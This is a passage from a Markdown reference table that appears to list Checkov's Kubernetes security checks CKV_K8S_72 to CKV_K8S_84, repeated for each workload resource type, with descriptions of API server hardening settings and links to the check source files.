Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2943 | CKV_K8S_72 | resource | PodTemplate | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2944 | CKV_K8S_72 | resource | ReplicaSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2945 | CKV_K8S_72 | resource | ReplicationController | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2946 | CKV_K8S_72 | resource | StatefulSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2947 | CKV_K8S_73 | resource | CronJob | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2948 | CKV_K8S_73 | resource | DaemonSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2949 | CKV_K8S_73 | resource | Deployment | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2950 | CKV_K8S_73 | resource | DeploymentConfig | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2951 | CKV_K8S_73 | resource | Job | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2952 | CKV_K8S_73 | resource | Pod | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2953 | CKV_K8S_73 | resource | PodTemplate | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2954 | CKV_K8S_73 | resource | ReplicaSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2955 | CKV_K8S_73 | resource | ReplicationController | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2956 | CKV_K8S_73 | resource | StatefulSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2957 | CKV_K8S_74 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2958 | CKV_K8S_74 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2959 | CKV_K8S_74 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2960 | CKV_K8S_74 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2961 | CKV_K8S_74 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2962 | CKV_K8S_74 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2963 | CKV_K8S_74 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2964 | CKV_K8S_74 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2965 | CKV_K8S_74 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2966 | CKV_K8S_74 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2967 | CKV_K8S_75 | resource | CronJob | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2968 | CKV_K8S_75 | resource | DaemonSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2969 | CKV_K8S_75 | resource | Deployment | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2970 | CKV_K8S_75 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2971 | CKV_K8S_75 | resource | Job | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2972 | CKV_K8S_75 | resource | Pod | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2973 | CKV_K8S_75 | resource | PodTemplate | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2974 | CKV_K8S_75 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2975 | CKV_K8S_75 | resource | ReplicationController | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2976 | CKV_K8S_75 | resource | StatefulSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2977 | CKV_K8S_77 | resource | CronJob | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2978 | CKV_K8S_77 | resource | DaemonSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2979 | CKV_K8S_77 | resource | Deployment | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2980 | CKV_K8S_77 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2981 | CKV_K8S_77 | resource | Job | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2982 | CKV_K8S_77 | resource | Pod | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2983 | CKV_K8S_77 | resource | PodTemplate | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2984 | CKV_K8S_77 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2985 | CKV_K8S_77 | resource | ReplicationController | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2986 | CKV_K8S_77 | resource | StatefulSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2987 | CKV_K8S_78 | resource | AdmissionConfiguration | Ensure that the admission control plugin EventRateLimit is set | Kubernetes | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py) | -| 2988 | CKV_K8S_79 | resource | CronJob | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2989 | CKV_K8S_79 | resource | DaemonSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2990 | CKV_K8S_79 | resource | Deployment | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2991 | CKV_K8S_79 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2992 | CKV_K8S_79 | resource | Job | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2993 | CKV_K8S_79 | resource | Pod | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2994 | CKV_K8S_79 | resource | PodTemplate | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2995 | CKV_K8S_79 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2996 | CKV_K8S_79 | resource | ReplicationController | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2997 | CKV_K8S_79 | resource | StatefulSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2998 | CKV_K8S_80 | resource | CronJob | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2999 | CKV_K8S_80 | resource | DaemonSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3000 | CKV_K8S_80 | resource | Deployment | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3001 | CKV_K8S_80 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3002 | CKV_K8S_80 | resource | Job | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3003 | CKV_K8S_80 | resource | Pod | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3004 | CKV_K8S_80 | resource | PodTemplate | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3005 | CKV_K8S_80 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3006 | CKV_K8S_80 | resource | ReplicationController | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3007 | CKV_K8S_80 | resource | StatefulSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3008 | CKV_K8S_81 | resource | CronJob | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3009 | CKV_K8S_81 | resource | DaemonSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3010 | CKV_K8S_81 | resource | Deployment | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3011 | CKV_K8S_81 | resource | DeploymentConfig | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3012 | CKV_K8S_81 | resource | Job | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3013 | CKV_K8S_81 | resource | Pod | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3014 | CKV_K8S_81 | resource | PodTemplate | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3015 | CKV_K8S_81 | resource | ReplicaSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3016 | CKV_K8S_81 | resource | ReplicationController | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3017 | CKV_K8S_81 | resource | StatefulSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3018 | CKV_K8S_82 | resource | CronJob | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3019 | CKV_K8S_82 | resource | DaemonSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3020 | CKV_K8S_82 | resource | Deployment | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3021 | CKV_K8S_82 | resource | DeploymentConfig | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3022 | CKV_K8S_82 | resource | Job | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3023 | CKV_K8S_82 | resource | Pod | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3024 | CKV_K8S_82 | resource | PodTemplate | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3025 | CKV_K8S_82 | resource | ReplicaSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3026 | CKV_K8S_82 | resource | ReplicationController | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3027 | CKV_K8S_82 | resource | StatefulSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3028 | CKV_K8S_83 | resource | CronJob | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3029 | CKV_K8S_83 | resource | DaemonSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3030 | CKV_K8S_83 | resource | Deployment | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3031 | CKV_K8S_83 | resource | DeploymentConfig | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3032 | CKV_K8S_83 | resource | Job | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3033 | CKV_K8S_83 | resource | Pod | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3034 | CKV_K8S_83 | resource | PodTemplate | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3035 | CKV_K8S_83 | resource | ReplicaSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3036 | CKV_K8S_83 | resource | ReplicationController | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3037 | CKV_K8S_83 | resource | StatefulSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3038 | CKV_K8S_84 | resource | CronJob | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3039 | CKV_K8S_84 | resource | DaemonSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3040 | CKV_K8S_84 | resource | Deployment | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3041 | CKV_K8S_84 | resource | DeploymentConfig | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3042 | CKV_K8S_84 | resource | Job | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | -| 3043 | CKV_K8S_84 | resource | Pod | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | 